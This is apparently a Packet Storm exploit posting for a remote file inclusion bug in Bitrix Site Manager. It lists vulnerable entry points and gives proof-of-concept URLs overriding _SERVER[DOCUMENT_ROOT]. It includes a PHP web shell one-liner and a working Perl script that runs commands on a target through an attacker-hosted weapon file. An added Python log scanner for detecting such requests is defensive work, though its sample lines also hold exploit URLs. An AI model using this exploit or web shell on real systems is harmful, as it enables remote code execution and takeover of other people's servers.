Bitrix Site Manager Remote File Inclusion

Posted Nov 18, 2009
Authored by Don Tukulesto | Site indonesiancoder.com

A new exploit for an old, already-known remote file inclusion bug (BID 13965) in Bitrix Site Manager: a query-string _SERVER[DOCUMENT_ROOT] parameter is used to redirect the include path of several Bitrix entry points to an attacker-hosted PHP file.

tags | exploit, remote, code execution, file inclusion
SHA-256 | 6a154e2b2c0cb34ec95bc116539057ecf20f9aacc494e528616d099222de9582

#####
# [+] Author : Don Tukulesto (root@indonesiancoder.com)
# [+] Date : November 13, 2009
# [+] Homepage : http://www.indonesiancoder.com
# [+] Vendor : http://www.bitrixsoft.com/
# [+] Method : Remote File Inclusion
# [+] Location : INDONESIA
# [~] Notes : I know this is an old bug, but I just wrote this exploit in Perl.
# [~] Reference : http://www.securityfocus.com/bid/13965
# [~] How To :
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####
# [-] Bugs in

[+] rss.php
<pre lang="php">
<?
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/iblock/rss.php");
?>
</pre>

[+] redirect.php
<pre lang="php">
<?
define("GENERATE_EVENT","Y");
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");
if (CModule::IncludeModule("statistic"))
{
$goto = eregi_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto);
}
else
{
$goto = eregi_replace("#EVENT_GID#","",$goto);
}
LocalRedirect($goto);
?>
</pre>

[+] click.php
<pre lang="php">
<?
define("GENERATE_EVENT","Y");
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");
if (intval($id)>0 and CModule::IncludeModule("advertising")) CAdvBanner::Click($id);
if (CModule::IncludeModule("statistic")) $goto = str_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto);
LocalRedirect($goto);
?>
</pre>

[+] admin/index.php
<pre lang="php">
<?
require_once(dirname(__FILE__)."/../modules/main/include/prolog_admin_before.php");
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php");
?>
<?
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/index.php");
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php");
?>
</pre>

[+] tools/help.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help.php");?>
</pre>

[+] tools/calendar.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/calendar.php");?>
</pre>

[+] tools/ticket_show_file.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/support/admin/ticket_show_file.php");?>
</pre>

[+] tools/imagepg.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/imagepg.php");?>
</pre>

[+] tools/help_view.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_view.php");?>
</pre>

[+] tools/help_create.php
<pre lang="php">
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_create.php");?>
</pre>

[-] PoC

BX_ROOT below stands for the Bitrix directory (/bitrix in the snippets above). Every listed file builds its require()/include() path from $_SERVER["DOCUMENT_ROOT"], so the PoC works only when register_globals is on and the PHP build lets a query-string _SERVER[DOCUMENT_ROOT] parameter overwrite that superglobal, and allow_url_fopen (allow_url_include on PHP 5.2+) permits fetching the remote file. Point the parameter at a host serving the weapon file:

http://127.0.0.1/BX_ROOT/rss.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/click.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/redirect.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/admin/index.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/help_create.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/help_view.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/imagepg.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/ticket_show_file.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/calendar.php?_SERVER[DOCUMENT_ROOT]=
http://127.0.0.1/BX_ROOT/tools/help.php?_SERVER[DOCUMENT_ROOT]=
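
The request pattern above is easy to spot after the fact. The following Python script is an added example (it is not part of the original exploit and not Bitrix code): it walks Apache combined-format access log lines, percent-decodes the query string so `_SERVER%5BDOCUMENT_ROOT%5D` and `_SERVER[DOCUMENT_ROOT]` are treated alike, and flags any parameter that tries to overwrite the $_SERVER superglobal, separating remote-URL values (the RFI case shown in the PoC) from local paths. The log lines, IP addresses and hostnames are constructed; the https/ftp schemes and the "local_override" class go beyond the http-only PoC and are assumptions about what else a defender would want to catch.

```python
"""Flag _SERVER[DOCUMENT_ROOT] override attempts in an Apache access log.

Added example, not code from the original exploit. Sample log lines are
constructed; https/ftp detection and the local_override class are assumptions
that extend the http-only PoC.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl

# Apache "combined" format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The PoC only uses http://; https and ftp are added as an assumption, since
# PHP's remote include wrappers accept them as well.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


@dataclass
class Finding:
    ip: str
    path: str
    param: str
    value: str
    kind: str                                         # "rfi" or "local_override"
    other_params: dict = field(default_factory=dict)  # e.g. the cmd= argument


def split_target(target):
    """Split a request target into path and decoded query parameters.
    parse_qsl percent-decodes, so the encoded and plain forms of the
    _SERVER[DOCUMENT_ROOT] key normalise to the same string."""
    path, _, query = target.partition("?")
    return path, parse_qsl(query, keep_blank_values=True)


def classify_target(target):
    """Return (path, hits); each hit is (param, value, kind, other_params)
    for a query parameter that tries to clobber the $_SERVER superglobal."""
    path, params = split_target(target)
    others = {k: v for k, v in params if not k.startswith("_SERVER[")}
    hits = []
    for key, value in params:
        if not key.startswith("_SERVER["):
            continue
        kind = "rfi" if value.lower().startswith(REMOTE_SCHEMES) else "local_override"
        hits.append((key, value, kind, others))
    return path, hits


def scan_log(text):
    """Parse every combined-format line and collect Finding records."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format, or a truncated line: skip it
        path, hits = classify_target(m["target"])
        for key, value, kind, others in hits:
            findings.append(Finding(m["ip"], path, key, value, kind, others))
    return findings


# Constructed sample traffic: two exploit requests (one percent-encoded), one
# local-path override, and two benign requests that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Nov/2009:10:01:02 +0000] "GET /bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://evil.example/shell.txt?&cmd=id HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
203.0.113.5 - - [18/Nov/2009:10:01:03 +0000] "GET /bitrix/rss.php?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.0" 200 88 "-" "libwww-perl/5.8"
198.51.100.7 - - [18/Nov/2009:10:02:00 +0000] "GET /bitrix/tools/help.php?_SERVER[DOCUMENT_ROOT]=/var/tmp/up HTTP/1.1" 200 40 "-" "curl/7.19"
198.51.100.9 - - [18/Nov/2009:10:03:00 +0000] "GET /bitrix/redirect.php?goto=/about/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Nov/2009:10:03:05 +0000] "GET /index.php?DOCUMENT_ROOT=http://x.example/ HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.kind:14} {f.ip:14} {f.path} {f.param}={f.value} {f.other_params}")
```

Run it against a real log with `scan_log(open("access.log").read())`; the `other_params` field keeps whatever command parameter the attacker chose, which is the one thing the PoC URLs above leave variable.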

[-] eXpL0!t c0des

<pre lang="perl">
#!/usr/bin/perl
# Interactive wrapper around the admin/index.php RFI: every command typed at the
# prompt is sent as
#   admin/index.php?_SERVER[DOCUMENT_ROOT]=<weapon url>?&<cmd>=<command>
# so the target include()s the remote weapon and the weapon runs the command.
use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

my $RoNz       = $ARGV[0];   # target base URL, e.g. http://127.0.0.1/path/
my $Pathloader = $ARGV[1];   # URL of the PHP weapon, e.g. http://.../shell.txt
my $Contrex    = $ARGV[2];   # GET parameter the weapon reads the command from

usage() unless defined $RoNz && defined $Pathloader && $Contrex
            && $RoNz =~ m{http://} && $Pathloader =~ m{http://};
head();

sub head
{
    print "[o]============================================================================[o]\r\n";
    print " | Bitrix Site Manager Multiple Remote File Include Vulnerability |\r\n";
    print "[o]============================================================================[o]\r\n";
}

my $arianom = LWP::UserAgent->new() or die;
while (1)
{
    print "[w00t] \$";
    my $kaMtiEz = <STDIN>;
    last unless defined $kaMtiEz;   # EOF on stdin: stop instead of re-prompting forever
    chomp($kaMtiEz);
    if (!$kaMtiEz) { print "\nPlease Enter a Command\n\n"; next; }

    # The weapon URL is followed by "?&" so the command parameter becomes part of
    # the request PHP makes for the remote file; the command is sent unencoded.
    my $tiw0L = HTTP::Request->new(GET => $RoNz.'admin/index.php?_SERVER[DOCUMENT_ROOT]='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz);
    my $abah_benu = $arianom->request($tiw0L);
    my $tukulesto = $abah_benu->content;

    if ($tukulesto =~ /failed to open stream: HTTP request denied!/ || $tukulesto =~ /: Cannot execute a blank command in /)
    {
        print "\nCan't Connect to cmd Host or Invalid Command\n";
        exit;
    }
    elsif ($tukulesto =~ /^<br.\/>.<b>Fatal.error/) { print "\nInvalid Command or No Return\n\n"; }

    # Whatever the included weapon printed is the command output.
    print "\r\n$tukulesto\n\r";
}

sub usage
{
    head();
    print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n";
    print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n";
    print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n";
    print " | <cmd> - Command variable used in php shell |\r\n";
    print "[o]============================================================================[o]\r\n";
    print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n";
    print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n";
    print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n";
    print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n";
    print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n";
    print "[o]============================================================================[o]\r\n";
    print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n";
    print "[o]============================================================================[o]\r\n";
    exit();
}
</pre>
© 2024 Packet Storm. All rights reserved.
